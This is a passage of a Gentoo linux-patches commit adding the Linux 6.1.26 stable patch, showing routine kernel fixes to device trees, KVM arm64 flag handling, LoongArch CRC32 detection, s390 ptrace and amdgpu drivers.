Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Apr 26 13:19:39 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=9d02faae

Linux patch 6.1.26

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1025_linux-6.1.26.patch | 3310 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 3314 insertions(+)

diff --git a/0000_README b/0000_README
index 7c4d9865..2dab4c18 100644
--- a/0000_README
+++ b/0000_README
@@ -143,6 +143,10 @@ Patch:  1024_linux-6.1.25.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.25
 
+Patch:  1025_linux-6.1.26.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.26
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1025_linux-6.1.26.patch b/1025_linux-6.1.26.patch
new file mode 100644
index 00000000..f8f558ac
--- /dev/null
+++ b/1025_linux-6.1.26.patch
@@ -0,0 +1,3310 @@
+diff --git a/Makefile b/Makefile
+index 1a4c4af370db8..d2eff3747f2f7 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 25
++SUBLEVEL = 26
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/rk3288.dtsi b/arch/arm/boot/dts/rk3288.dtsi
+index 2ca76b69add78..511ca864c1b2d 100644
+--- a/arch/arm/boot/dts/rk3288.dtsi
++++ b/arch/arm/boot/dts/rk3288.dtsi
+@@ -942,7 +942,7 @@
+ 		status = "disabled";
+ 	};
+ 
+-	spdif: sound@ff88b0000 {
++	spdif: sound@ff8b0000 {
+ 		compatible = "rockchip,rk3288-spdif", "rockchip,rk3066-spdif";
+ 		reg = <0x0 0xff8b0000 0x0 0x10000>;
+ 		#sound-dai-cells = <0>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi b/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
+index 131a8a5a9f5a0..88b848c65b0d2 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
+@@ -1571,10 +1571,9 @@
+ 
+ 			dmc: bus@38000 {
+ 				compatible = "simple-bus";
+-				reg = <0x0 0x38000 0x0 0x400>;
+ 				#address-cells = <2>;
+ 				#size-cells = <2>;
+-				ranges = <0x0 0x0 0x0 0x38000 0x0 0x400>;
++				ranges = <0x0 0x0 0x0 0x38000 0x0 0x2000>;
+ 
+ 				canvas: video-lut@48 {
+ 					compatible = "amlogic,canvas";
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-evk.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-evk.dtsi
+index 7d6317d95b131..1dd0617477fdf 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-evk.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-evk.dtsi
+@@ -193,7 +193,7 @@
+ 		rohm,reset-snvs-powered;
+ 
+ 		#clock-cells = <0>;
+-		clocks = <&osc_32k 0>;
++		clocks = <&osc_32k>;
+ 		clock-output-names = "clk-32k-out";
+ 
+ 		regulators {
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
+index 59445f916d7fa..b4aef79650c69 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
+@@ -95,7 +95,7 @@
+ 		compatible = "regulator-fixed";
+ 		enable-active-high;
+ 		gpio = <&gpio2 20 GPIO_ACTIVE_HIGH>; /* PMIC_EN_ETH */
+-		off-on-delay = <500000>;
++		off-on-delay-us = <500000>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_reg_eth>;
+ 		regulator-always-on;
+@@ -135,7 +135,7 @@
+ 		enable-active-high;
+ 		/* Verdin SD_1_PWR_EN (SODIMM 76) */
+ 		gpio = <&gpio3 5 GPIO_ACTIVE_HIGH>;
+-		off-on-delay = <100000>;
++		off-on-delay-us = <100000>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_usdhc2_pwr_en>;
+ 		regulator-max-microvolt = <3300000>;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp-verdin-dev.dtsi b/arch/arm64/boot/dts/freescale/imx8mp-verdin-dev.dtsi
+index cefabe65b2520..c8b521d45fca1 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp-verdin-dev.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mp-verdin-dev.dtsi
+@@ -12,7 +12,7 @@
+ 		compatible = "regulator-fixed";
+ 		enable-active-high;
+ 		gpio = <&gpio_expander_21 4 GPIO_ACTIVE_HIGH>; /* ETH_PWR_EN */
+-		off-on-delay = <500000>;
++		off-on-delay-us = <500000>;
+ 		regulator-max-microvolt = <3300000>;
+ 		regulator-min-microvolt = <3300000>;
+ 		regulator-name = "+V3.3_ETH";
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp-verdin.dtsi b/arch/arm64/boot/dts/freescale/imx8mp-verdin.dtsi
+index 5dcd1de586b52..371144eb40188 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp-verdin.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mp-verdin.dtsi
+@@ -86,7 +86,7 @@
+ 		compatible = "regulator-fixed";
+ 		enable-active-high;
+ 		gpio = <&gpio2 20 GPIO_ACTIVE_HIGH>; /* PMIC_EN_ETH */
+-		off-on-delay = <500000>;
++		off-on-delay-us = <500000>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_reg_eth>;
+ 		regulator-always-on;
+@@ -127,7 +127,7 @@
+ 		enable-active-high;
+ 		/* Verdin SD_1_PWR_EN (SODIMM 76) */
+ 		gpio = <&gpio4 22 GPIO_ACTIVE_HIGH>;
+-		off-on-delay = <100000>;
++		off-on-delay-us = <100000>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_usdhc2_pwr_en>;
+ 		regulator-max-microvolt = <3300000>;
+diff --git a/arch/arm64/boot/dts/qcom/ipq8074-hk01.dts b/arch/arm64/boot/dts/qcom/ipq8074-hk01.dts
+index 7143c936de61e..bb0a838891f64 100644
+--- a/arch/arm64/boot/dts/qcom/ipq8074-hk01.dts
++++ b/arch/arm64/boot/dts/qcom/ipq8074-hk01.dts
+@@ -59,11 +59,11 @@
+ 	perst-gpios = <&tlmm 58 0x1>;
+ };
+ 
+-&pcie_phy0 {
++&pcie_qmp0 {
+ 	status = "okay";
+ };
+ 
+-&pcie_phy1 {
++&pcie_qmp1 {
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/ipq8074-hk10.dtsi b/arch/arm64/boot/dts/qcom/ipq8074-hk10.dtsi
+index db4b87944cdf2..a695686afadfc 100644
+--- a/arch/arm64/boot/dts/qcom/ipq8074-hk10.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq8074-hk10.dtsi
+@@ -22,7 +22,7 @@
+ };
+ 
+ &blsp1_spi1 {
+-	status = "ok";
++	status = "okay";
+ 
+ 	flash@0 {
+ 		#address-cells = <1>;
+@@ -34,33 +34,33 @@
+ };
+ 
+ &blsp1_uart5 {
+-	status = "ok";
++	status = "okay";
+ };
+ 
+ &pcie0 {
+-	status = "ok";
++	status = "okay";
+ 	perst-gpios = <&tlmm 58 0x1>;
+ };
+ 
+ &pcie1 {
+-	status = "ok";
++	status = "okay";
+ 	perst-gpios = <&tlmm 61 0x1>;
+ };
+ 
+-&pcie_phy0 {
+-	status = "ok";
++&pcie_qmp0 {
++	status = "okay";
+ };
+ 
+-&pcie_phy1 {
+-	status = "ok";
++&pcie_qmp1 {
++	status = "okay";
+ };
+ 
+ &qpic_bam {
+-	status = "ok";
++	status = "okay";
+ };
+ 
+ &qpic_nand {
+-	status = "ok";
++	status = "okay";
+ 
+ 	nand@0 {
+ 		reg = <0>;
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp-pmics.dtsi b/arch/arm64/boot/dts/qcom/sc8280xp-pmics.dtsi
+index 24836b6b9bbc9..be0df0856df9b 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp-pmics.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc8280xp-pmics.dtsi
+@@ -15,8 +15,9 @@
+ 		#size-cells = <0>;
+ 
+ 		pmk8280_pon: pon@1300 {
+-			compatible = "qcom,pm8998-pon";
+-			reg = <0x1300>;
++			compatible = "qcom,pmk8350-pon";
++			reg = <0x1300>, <0x800>;
++			reg-names = "hlos", "pbs";
+ 
+ 			pmk8280_pon_pwrkey: pwrkey {
+ 				compatible = "qcom,pmk8350-pwrkey";
+diff --git a/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi b/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi
+index 5bcd4be329643..4d494b53a71ab 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi
+@@ -540,7 +540,7 @@
+ 	non-removable;
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&sdmmc1_bus4 &sdmmc1_cmd &sdmmc1_clk>;
+-	sd-uhs-sdr104;
++	sd-uhs-sdr50;
+ 	vmmc-supply = <&vcc3v3_sys>;
+ 	vqmmc-supply = <&vcc_1v8>;
+ 	status = "okay";
+diff --git a/arch/arm64/include/asm/kvm_host.h b/arch/arm64/include/asm/kvm_host.h
+index 45e2136322ba2..e2b45c937c58a 100644
+--- a/arch/arm64/include/asm/kvm_host.h
++++ b/arch/arm64/include/asm/kvm_host.h
+@@ -449,9 +449,22 @@ struct kvm_vcpu_arch {
+ 	({							\
+ 		__build_check_flag(v, flagset, f, m);		\
+ 								\
+-		v->arch.flagset & (m);				\
++		READ_ONCE(v->arch.flagset) & (m);		\
+ 	})
+ 
++/*
++ * Note that the set/clear accessors must be preempt-safe in order to
++ * avoid nesting them with load/put which also manipulate flags...
++ */
++#ifdef __KVM_NVHE_HYPERVISOR__
++/* the nVHE hypervisor is always non-preemptible */
++#define __vcpu_flags_preempt_disable()
++#define __vcpu_flags_preempt_enable()
++#else
++#define __vcpu_flags_preempt_disable()	preempt_disable()
++#define __vcpu_flags_preempt_enable()	preempt_enable()
++#endif
++
+ #define __vcpu_set_flag(v, flagset, f, m)			\
+ 	do {							\
+ 		typeof(v->arch.flagset) *fset;			\
+@@ -459,9 +472,11 @@ struct kvm_vcpu_arch {
+ 		__build_check_flag(v, flagset, f, m);		\
+ 								\
+ 		fset = &v->arch.flagset;			\
++		__vcpu_flags_preempt_disable();			\
+ 		if (HWEIGHT(m) > 1)				\
+ 			*fset &= ~(m);				\
+ 		*fset |= (f);					\
++		__vcpu_flags_preempt_enable();			\
+ 	} while (0)
+ 
+ #define __vcpu_clear_flag(v, flagset, f, m)			\
+@@ -471,7 +486,9 @@ struct kvm_vcpu_arch {
+ 		__build_check_flag(v, flagset, f, m);		\
+ 								\
+ 		fset = &v->arch.flagset;			\
++		__vcpu_flags_preempt_disable();			\
+ 		*fset &= ~(m);					\
++		__vcpu_flags_preempt_enable();			\
+ 	} while (0)
+ 
+ #define vcpu_get_flag(v, ...)	__vcpu_get_flag((v), __VA_ARGS__)
+diff --git a/arch/arm64/kvm/hypercalls.c b/arch/arm64/kvm/hypercalls.c
+index c9f401fa01a93..950e35b993d2b 100644
+--- a/arch/arm64/kvm/hypercalls.c
++++ b/arch/arm64/kvm/hypercalls.c
+@@ -397,6 +397,8 @@ int kvm_arm_set_fw_reg(struct kvm_vcpu *vcpu, const struct kvm_one_reg *reg)
+ 	u64 val;
+ 	int wa_level;
+ 
++	if (KVM_REG_SIZE(reg->id) != sizeof(val))
++		return -ENOENT;
+ 	if (copy_from_user(&val, uaddr, KVM_REG_SIZE(reg->id)))
+ 		return -EFAULT;
+ 
+diff --git a/arch/loongarch/include/asm/cpu-features.h b/arch/loongarch/include/asm/cpu-features.h
+index b07974218393d..f6177f1334776 100644
+--- a/arch/loongarch/include/asm/cpu-features.h
++++ b/arch/loongarch/include/asm/cpu-features.h
+@@ -42,6 +42,7 @@
+ #define cpu_has_fpu		cpu_opt(LOONGARCH_CPU_FPU)
+ #define cpu_has_lsx		cpu_opt(LOONGARCH_CPU_LSX)
+ #define cpu_has_lasx		cpu_opt(LOONGARCH_CPU_LASX)
++#define cpu_has_crc32		cpu_opt(LOONGARCH_CPU_CRC32)
+ #define cpu_has_complex		cpu_opt(LOONGARCH_CPU_COMPLEX)
+ #define cpu_has_crypto		cpu_opt(LOONGARCH_CPU_CRYPTO)
+ #define cpu_has_lvz		cpu_opt(LOONGARCH_CPU_LVZ)
+diff --git a/arch/loongarch/include/asm/cpu.h b/arch/loongarch/include/asm/cpu.h
+index 754f285067913..9275770552636 100644
+--- a/arch/loongarch/include/asm/cpu.h
++++ b/arch/loongarch/include/asm/cpu.h
+@@ -78,25 +78,26 @@ enum cpu_type_enum {
+ #define CPU_FEATURE_FPU			3	/* CPU has FPU */
+ #define CPU_FEATURE_LSX			4	/* CPU has LSX (128-bit SIMD) */
+ #define CPU_FEATURE_LASX		5	/* CPU has LASX (256-bit SIMD) */
+-#define CPU_FEATURE_COMPLEX		6	/* CPU has Complex instructions */
+-#define CPU_FEATURE_CRYPTO		7	/* CPU has Crypto instructions */
+-#define CPU_FEATURE_LVZ			8	/* CPU has Virtualization extension */
+-#define CPU_FEATURE_LBT_X86		9	/* CPU has X86 Binary Translation */
+-#define CPU_FEATURE_LBT_ARM		10	/* CPU has ARM Binary Translation */
+-#define CPU_FEATURE_LBT_MIPS		11	/* CPU has MIPS Binary Translation */
+-#define CPU_FEATURE_TLB			12	/* CPU has TLB */
+-#define CPU_FEATURE_CSR			13	/* CPU has CSR */
+-#define CPU_FEATURE_WATCH		14	/* CPU has watchpoint registers */
+-#define CPU_FEATURE_VINT		15	/* CPU has vectored interrupts */
+-#define CPU_FEATURE_CSRIPI		16	/* CPU has CSR-IPI */
+-#define CPU_FEATURE_EXTIOI		17	/* CPU has EXT-IOI */
+-#define CPU_FEATURE_PREFETCH		18	/* CPU has prefetch instructions */
+-#define CPU_FEATURE_PMP			19	/* CPU has perfermance counter */
+-#define CPU_FEATURE_SCALEFREQ		20	/* CPU supports cpufreq scaling */
+-#define CPU_FEATURE_FLATMODE		21	/* CPU has flat mode */
+-#define CPU_FEATURE_EIODECODE		22	/* CPU has EXTIOI interrupt pin decode mode */
+-#define CPU_FEATURE_GUESTID		23	/* CPU has GuestID feature */
+-#define CPU_FEATURE_HYPERVISOR		24	/* CPU has hypervisor (running in VM) */
++#define CPU_FEATURE_CRC32		6	/* CPU has CRC32 instructions */
++#define CPU_FEATURE_COMPLEX		7	/* CPU has Complex instructions */
++#define CPU_FEATURE_CRYPTO		8	/* CPU has Crypto instructions */
++#define CPU_FEATURE_LVZ			9	/* CPU has Virtualization extension */
++#define CPU_FEATURE_LBT_X86		10	/* CPU has X86 Binary Translation */
++#define CPU_FEATURE_LBT_ARM		11	/* CPU has ARM Binary Translation */
++#define CPU_FEATURE_LBT_MIPS		12	/* CPU has MIPS Binary Translation */
++#define CPU_FEATURE_TLB			13	/* CPU has TLB */
++#define CPU_FEATURE_CSR			14	/* CPU has CSR */
++#define CPU_FEATURE_WATCH		15	/* CPU has watchpoint registers */
++#define CPU_FEATURE_VINT		16	/* CPU has vectored interrupts */
++#define CPU_FEATURE_CSRIPI		17	/* CPU has CSR-IPI */
++#define CPU_FEATURE_EXTIOI		18	/* CPU has EXT-IOI */
++#define CPU_FEATURE_PREFETCH		19	/* CPU has prefetch instructions */
++#define CPU_FEATURE_PMP			20	/* CPU has perfermance counter */
++#define CPU_FEATURE_SCALEFREQ		21	/* CPU supports cpufreq scaling */
++#define CPU_FEATURE_FLATMODE		22	/* CPU has flat mode */
++#define CPU_FEATURE_EIODECODE		23	/* CPU has EXTIOI interrupt pin decode mode */
++#define CPU_FEATURE_GUESTID		24	/* CPU has GuestID feature */
++#define CPU_FEATURE_HYPERVISOR		25	/* CPU has hypervisor (running in VM) */
+ 
+ #define LOONGARCH_CPU_CPUCFG		BIT_ULL(CPU_FEATURE_CPUCFG)
+ #define LOONGARCH_CPU_LAM		BIT_ULL(CPU_FEATURE_LAM)
+@@ -104,6 +105,7 @@ enum cpu_type_enum {
+ #define LOONGARCH_CPU_FPU		BIT_ULL(CPU_FEATURE_FPU)
+ #define LOONGARCH_CPU_LSX		BIT_ULL(CPU_FEATURE_LSX)
+ #define LOONGARCH_CPU_LASX		BIT_ULL(CPU_FEATURE_LASX)
++#define LOONGARCH_CPU_CRC32		BIT_ULL(CPU_FEATURE_CRC32)
+ #define LOONGARCH_CPU_COMPLEX		BIT_ULL(CPU_FEATURE_COMPLEX)
+ #define LOONGARCH_CPU_CRYPTO		BIT_ULL(CPU_FEATURE_CRYPTO)
+ #define LOONGARCH_CPU_LVZ		BIT_ULL(CPU_FEATURE_LVZ)
+diff --git a/arch/loongarch/include/asm/loongarch.h b/arch/loongarch/include/asm/loongarch.h
+index 7f8d57a61c8bd..62835d84a647d 100644
+--- a/arch/loongarch/include/asm/loongarch.h
++++ b/arch/loongarch/include/asm/loongarch.h
+@@ -117,7 +117,7 @@ static inline u32 read_cpucfg(u32 reg)
+ #define  CPUCFG1_EP			BIT(22)
+ #define  CPUCFG1_RPLV			BIT(23)
+ #define  CPUCFG1_HUGEPG			BIT(24)
+-#define  CPUCFG1_IOCSRBRD		BIT(25)
++#define  CPUCFG1_CRC32			BIT(25)
+ #define  CPUCFG1_MSGINT			BIT(26)
+ 
+ #define LOONGARCH_CPUCFG2		0x2
+diff --git a/arch/loongarch/kernel/cpu-probe.c b/arch/loongarch/kernel/cpu-probe.c
+index 3a3fce2d78461..5adf0f736c6d7 100644
+--- a/arch/loongarch/kernel/cpu-probe.c
++++ b/arch/loongarch/kernel/cpu-probe.c
+@@ -60,7 +60,7 @@ static inline void set_elf_platform(int cpu, const char *plat)
+ 
+ /* MAP BASE */
+ unsigned long vm_map_base;
+-EXPORT_SYMBOL_GPL(vm_map_base);
++EXPORT_SYMBOL(vm_map_base);
+ 
+ static void cpu_probe_addrbits(struct cpuinfo_loongarch *c)
+ {
+@@ -94,13 +94,18 @@ static void cpu_probe_common(struct cpuinfo_loongarch *c)
+ 	c->options = LOONGARCH_CPU_CPUCFG | LOONGARCH_CPU_CSR |
+ 		     LOONGARCH_CPU_TLB | LOONGARCH_CPU_VINT | LOONGARCH_CPU_WATCH;
+ 
+-	elf_hwcap = HWCAP_LOONGARCH_CPUCFG | HWCAP_LOONGARCH_CRC32;
++	elf_hwcap = HWCAP_LOONGARCH_CPUCFG;
+ 
+ 	config = read_cpucfg(LOONGARCH_CPUCFG1);
+ 	if (config & CPUCFG1_UAL) {
+ 		c->options |= LOONGARCH_CPU_UAL;
+ 		elf_hwcap |= HWCAP_LOONGARCH_UAL;
+ 	}
++	if (config & CPUCFG1_CRC32) {
++		c->options |= LOONGARCH_CPU_CRC32;
++		elf_hwcap |= HWCAP_LOONGARCH_CRC32;
++	}
++
+ 
+ 	config = read_cpucfg(LOONGARCH_CPUCFG2);
+ 	if (config & CPUCFG2_LAM) {
+diff --git a/arch/loongarch/kernel/proc.c b/arch/loongarch/kernel/proc.c
+index 5c67cc4fd56d5..0d82907b5404c 100644
+--- a/arch/loongarch/kernel/proc.c
++++ b/arch/loongarch/kernel/proc.c
+@@ -76,6 +76,7 @@ static int show_cpuinfo(struct seq_file *m, void *v)
+ 	if (cpu_has_fpu)	seq_printf(m, " fpu");
+ 	if (cpu_has_lsx)	seq_printf(m, " lsx");
+ 	if (cpu_has_lasx)	seq_printf(m, " lasx");
++	if (cpu_has_crc32)	seq_printf(m, " crc32");
+ 	if (cpu_has_complex)	seq_printf(m, " complex");
+ 	if (cpu_has_crypto)	seq_printf(m, " crypto");
+ 	if (cpu_has_lvz)	seq_printf(m, " lvz");
+diff --git a/arch/loongarch/mm/init.c b/arch/loongarch/mm/init.c
+index 080061793c859..c7e9c96719fa3 100644
+--- a/arch/loongarch/mm/init.c
++++ b/arch/loongarch/mm/init.c
+@@ -41,7 +41,7 @@
+  * don't have to care about aliases on other CPUs.
+  */
+ unsigned long empty_zero_page, zero_page_mask;
+-EXPORT_SYMBOL_GPL(empty_zero_page);
++EXPORT_SYMBOL(empty_zero_page);
+ EXPORT_SYMBOL(zero_page_mask);
+ 
+ void setup_zero_pages(void)
+@@ -231,7 +231,7 @@ pud_t invalid_pud_table[PTRS_PER_PUD] __page_aligned_bss;
+ #endif
+ #ifndef __PAGETABLE_PMD_FOLDED
+ pmd_t invalid_pmd_table[PTRS_PER_PMD] __page_aligned_bss;
+-EXPORT_SYMBOL_GPL(invalid_pmd_table);
++EXPORT_SYMBOL(invalid_pmd_table);
+ #endif
+ pte_t invalid_pte_table[PTRS_PER_PTE] __page_aligned_bss;
+ EXPORT_SYMBOL(invalid_pte_table);
+diff --git a/arch/mips/kernel/vmlinux.lds.S b/arch/mips/kernel/vmlinux.lds.S
+index 1f98947fe715d..91d6a5360bb9c 100644
+--- a/arch/mips/kernel/vmlinux.lds.S
++++ b/arch/mips/kernel/vmlinux.lds.S
+@@ -15,6 +15,8 @@
+ #define EMITS_PT_NOTE
+ #endif
+ 
++#define RUNTIME_DISCARD_EXIT
++
+ #include <asm-generic/vmlinux.lds.h>
+ 
+ #undef mips
+diff --git a/arch/riscv/purgatory/Makefile b/arch/riscv/purgatory/Makefile
+index dd58e1d993972..659e21862077b 100644
+--- a/arch/riscv/purgatory/Makefile
++++ b/arch/riscv/purgatory/Makefile
+@@ -74,9 +74,7 @@ CFLAGS_string.o			+= $(PURGATORY_CFLAGS)
+ CFLAGS_REMOVE_ctype.o		+= $(PURGATORY_CFLAGS_REMOVE)
+ CFLAGS_ctype.o			+= $(PURGATORY_CFLAGS)
+ 
+-AFLAGS_REMOVE_entry.o		+= -Wa,-gdwarf-2
+-AFLAGS_REMOVE_memcpy.o		+= -Wa,-gdwarf-2
+-AFLAGS_REMOVE_memset.o		+= -Wa,-gdwarf-2
++asflags-remove-y		+= $(foreach x, -g -gdwarf-4 -gdwarf-5, $(x) -Wa,$(x))
+ 
+ $(obj)/purgatory.ro: $(PURGATORY_OBJS) FORCE
+ 		$(call if_changed,ld)
+diff --git a/arch/s390/kernel/ptrace.c b/arch/s390/kernel/ptrace.c
+index 53e0209229f87..092b16b4dd4f6 100644
+--- a/arch/s390/kernel/ptrace.c
++++ b/arch/s390/kernel/ptrace.c
+@@ -474,9 +474,7 @@ long arch_ptrace(struct task_struct *child, long request,
+ 		}
+ 		return 0;
+ 	case PTRACE_GET_LAST_BREAK:
+-		put_user(child->thread.last_break,
+-			 (unsigned long __user *) data);
+-		return 0;
++		return put_user(child->thread.last_break, (unsigned long __user *)data);
+ 	case PTRACE_ENABLE_TE:
+ 		if (!MACHINE_HAS_TE)
+ 			return -EIO;
+@@ -824,9 +822,7 @@ long compat_arch_ptrace(struct task_struct *child, compat_long_t request,
+ 		}
+ 		return 0;
+ 	case PTRACE_GET_LAST_BREAK:
+-		put_user(child->thread.last_break,
+-			 (unsigned int __user *) data);
+-		return 0;
++		return put_user(child->thread.last_break, (unsigned int __user *)data);
+ 	}
+ 	return compat_ptrace_request(child, request, addr, data);
+ }
+diff --git a/arch/x86/purgatory/Makefile b/arch/x86/purgatory/Makefile
+index 17f09dc263811..82fec66d46d29 100644
+--- a/arch/x86/purgatory/Makefile
++++ b/arch/x86/purgatory/Makefile
+@@ -69,8 +69,7 @@ CFLAGS_sha256.o			+= $(PURGATORY_CFLAGS)
+ CFLAGS_REMOVE_string.o		+= $(PURGATORY_CFLAGS_REMOVE)
+ CFLAGS_string.o			+= $(PURGATORY_CFLAGS)
+ 
+-AFLAGS_REMOVE_setup-x86_$(BITS).o	+= -Wa,-gdwarf-2
+-AFLAGS_REMOVE_entry64.o			+= -Wa,-gdwarf-2
++asflags-remove-y		+= $(foreach x, -g -gdwarf-4 -gdwarf-5, $(x) -Wa,$(x))
+ 
+ $(obj)/purgatory.ro: $(PURGATORY_OBJS) FORCE
+ 		$(call if_changed,ld)
+diff --git a/drivers/fpga/fpga-bridge.c b/drivers/fpga/fpga-bridge.c
+index 727704431f618..13918c8c839ea 100644
+--- a/drivers/fpga/fpga-bridge.c
++++ b/drivers/fpga/fpga-bridge.c
+@@ -360,7 +360,6 @@ fpga_bridge_register(struct device *parent, const char *name,
+ 	bridge->dev.parent = parent;
+ 	bridge->dev.of_node = parent->of_node;
+ 	bridge->dev.id = id;
+-	of_platform_populate(bridge->dev.of_node, NULL, NULL, &bridge->dev);
+ 
+ 	ret = dev_set_name(&bridge->dev, "br%d", id);
+ 	if (ret)
+@@ -372,6 +371,8 @@ fpga_bridge_register(struct device *parent, const char *name,
+ 		return ERR_PTR(ret);
+ 	}
+ 
++	of_platform_populate(bridge->dev.of_node, NULL, NULL, &bridge->dev);
++
+ 	return bridge;
+ 
+ error_device:
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
+index 89011bae7588e..ca5dc51600fac 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
+@@ -653,6 +653,9 @@ int amdgpu_irq_put(struct amdgpu_device *adev, struct amdgpu_irq_src *src,
+ 	if (!src->enabled_types || !src->funcs->set)
+ 		return -EINVAL;
+ 
++	if (WARN_ON(!amdgpu_irq_enabled(adev, src, type)))
++		return -EINVAL;
++
+ 	if (atomic_dec_and_test(&src->enabled_types[type]))
+ 		return amdgpu_irq_update(adev, src, type);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
+index ce64ca1c6e669..5c1193dd7d88c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
+@@ -26,6 +26,7 @@
+ 
+ #include <linux/firmware.h>
+ #include <linux/module.h>
++#include <linux/dmi.h>
+ #include <linux/pci.h>
+ #include <linux/debugfs.h>
+ #include <drm/drm_drv.h>
+@@ -84,6 +85,7 @@ int amdgpu_vcn_sw_init(struct amdgpu_device *adev)
+ {
+ 	unsigned long bo_size;
+ 	const char *fw_name;
++	const char *bios_ver;
+ 	const struct common_firmware_header *hdr;
+ 	unsigned char fw_check;
+ 	unsigned int fw_shared_size, log_offset;
+@@ -159,6 +161,21 @@ int amdgpu_vcn_sw_init(struct amdgpu_device *adev)
+ 		if ((adev->firmware.load_type == AMDGPU_FW_LOAD_PSP) &&
+ 		    (adev->pg_flags & AMD_PG_SUPPORT_VCN_DPG))
+ 			adev->vcn.indirect_sram = true;
++		/*
++		 * Some Steam Deck's BIOS versions are incompatible with the
++		 * indirect SRAM mode, leading to amdgpu being unable to get
++		 * properly probed (and even potentially crashing the kernel).
++		 * Hence, check for these versions here - notice this is
++		 * restricted to Vangogh (Deck's APU).
++		 */
++		bios_ver = dmi_get_system_info(DMI_BIOS_VERSION);
++
++		if (bios_ver && (!strncmp("F7A0113", bios_ver, 7) ||
++		     !strncmp("F7A0114", bios_ver, 7))) {
++			adev->vcn.indirect_sram = false;
++			dev_info(adev->dev,
++				"Steam Deck quirk: indirect SRAM disabled on BIOS %s\n", bios_ver);
++		}
+ 		break;
+ 	case IP_VERSION(3, 0, 16):
+ 		fw_name = FIRMWARE_DIMGREY_CAVEFISH;
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+index b87f50e8fa615..1ec643a0d00d2 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+@@ -167,10 +167,21 @@ static inline int dm_set_vblank(struct drm_crtc *crtc, bool enable)
+ 	if (rc)
+ 		return rc;
+ 
+-	irq_source = IRQ_TYPE_VBLANK + acrtc->otg_inst;
++	if (amdgpu_in_reset(adev)) {
++		irq_source = IRQ_TYPE_VBLANK + acrtc->otg_inst;
++		/* During gpu-reset we disable and then enable vblank irq, so
++		 * don't use amdgpu_irq_get/put() to avoid refcount change.
++		 */
++		if (!dc_interrupt_set(adev->dm.dc, irq_source, enable))
++			rc = -EBUSY;
++	} else {
++		rc = (enable)
++			? amdgpu_irq_get(adev, &adev->crtc_irq, acrtc->crtc_id)
++			: amdgpu_irq_put(adev, &adev->crtc_irq, acrtc->crtc_id);
++	}
+ 
+-	if (!dc_interrupt_set(adev->dm.dc, irq_source, enable))
+-		return -EBUSY;
++	if (rc)
++		return rc;
+ 
+ skip:
+ 	if (amdgpu_in_reset(adev))
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
+index 7dd0845d1bd9f..8e416433184cf 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
